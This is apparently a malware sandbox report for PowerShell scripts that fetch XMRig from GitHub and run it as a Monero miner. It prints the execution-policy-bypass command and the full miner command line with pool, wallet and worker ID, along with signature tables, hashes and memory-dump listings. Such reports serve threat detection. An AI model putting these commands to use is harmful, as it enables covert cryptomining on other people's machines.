| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2868 wrote to memory of 4820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2868 wrote to memory of 4820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.11:443 | tcp |
Files
memory/2868-0-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_acdbwelm.ljv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2868-9-0x00000173ACBB0000-0x00000173ACBD2000-memory.dmp
memory/2868-10-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/2868-11-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/2868-12-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/2868-14-0x00000173C51A0000-0x00000173C51B2000-memory.dmp
memory/2868-15-0x00000173C5190000-0x00000173C519A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4820-46-0x000001F2FF830000-0x000001F2FF850000-memory.dmp
memory/4820-47-0x000001F2FF880000-0x000001F2FF8A0000-memory.dmp
memory/4820-48-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/2868-49-0x00007FFDFF433000-0x00007FFDFF435000-memory.dmp
memory/2868-50-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/4820-51-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-54-0x000001F2FFD70000-0x000001F2FFD90000-memory.dmp
memory/4820-53-0x000001F2FFD50000-0x000001F2FFD70000-memory.dmp
memory/2868-52-0x00007FFDFF430000-0x00007FFDFFEF2000-memory.dmp
memory/4820-55-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-56-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-57-0x000001F2FFD50000-0x000001F2FFD70000-memory.dmp
memory/4820-58-0x000001F2FFD70000-0x000001F2FFD90000-memory.dmp
memory/4820-59-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-60-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-61-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-62-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-63-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-64-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-65-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-66-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-67-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-68-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-69-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-70-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-71-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-72-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-73-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-74-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-75-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-76-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-77-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-78-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-79-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-80-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-81-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-82-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-83-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-84-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-85-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-86-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-87-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-88-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-89-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-90-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-91-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-92-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-93-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-94-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-95-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-96-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-97-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-98-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-99-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-100-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-101-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-102-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-103-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-104-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-105-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-106-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-107-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-108-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-109-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-110-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-111-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-112-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-113-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-114-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-115-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-116-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
memory/4820-117-0x00007FF7B6390000-0x00007FF7B6FC3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:47
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
Network
Files
memory/2164-4-0x000007FEF622E000-0x000007FEF622F000-memory.dmp
memory/2164-5-0x000000001B690000-0x000000001B972000-memory.dmp
memory/2164-6-0x00000000028E0000-0x00000000028E8000-memory.dmp
memory/2164-7-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-9-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-8-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-11-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-10-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
memory/2164-12-0x000007FEF5F70000-0x000007FEF690D000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:52
Platform
win11-20240508-en
Max time kernel
1798s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4936 wrote to memory of 4624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4936 wrote to memory of 4624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4936-0-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hoivu5nd.2jr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4936-10-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-9-0x000002C170CB0000-0x000002C170CD2000-memory.dmp
memory/4936-11-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-12-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-14-0x000002C1711A0000-0x000002C1711B2000-memory.dmp
memory/4936-15-0x000002C171190000-0x000002C17119A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4624-46-0x000001E053E10000-0x000001E053E30000-memory.dmp
memory/4624-47-0x000001E053E60000-0x000001E053E80000-memory.dmp
memory/4624-48-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-52-0x000001E055630000-0x000001E055650000-memory.dmp
memory/4624-53-0x000001E055650000-0x000001E055670000-memory.dmp
memory/4624-49-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4936-51-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp
memory/4936-50-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp
memory/4624-54-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-55-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-56-0x000001E055630000-0x000001E055650000-memory.dmp
memory/4624-57-0x000001E055650000-0x000001E055670000-memory.dmp
memory/4624-58-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-59-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-60-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-61-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-62-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-63-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-64-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-65-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-66-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-67-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-68-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-69-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-70-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-71-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-72-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-73-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-74-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-75-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-76-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-77-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-78-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-79-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-80-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-81-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-82-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-83-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-84-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-85-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-86-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-87-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-88-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-89-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-90-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-91-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-92-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-93-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-94-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-95-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-96-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-97-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-98-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-99-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-100-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-101-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-102-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-103-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-104-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-105-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-106-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-107-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-108-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-109-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-110-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-111-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-112-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-113-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-114-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-115-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
memory/4624-116-0x00007FF70C060000-0x00007FF70CC93000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:24
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1328 wrote to memory of 2076 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1328 wrote to memory of 2076 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4204 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
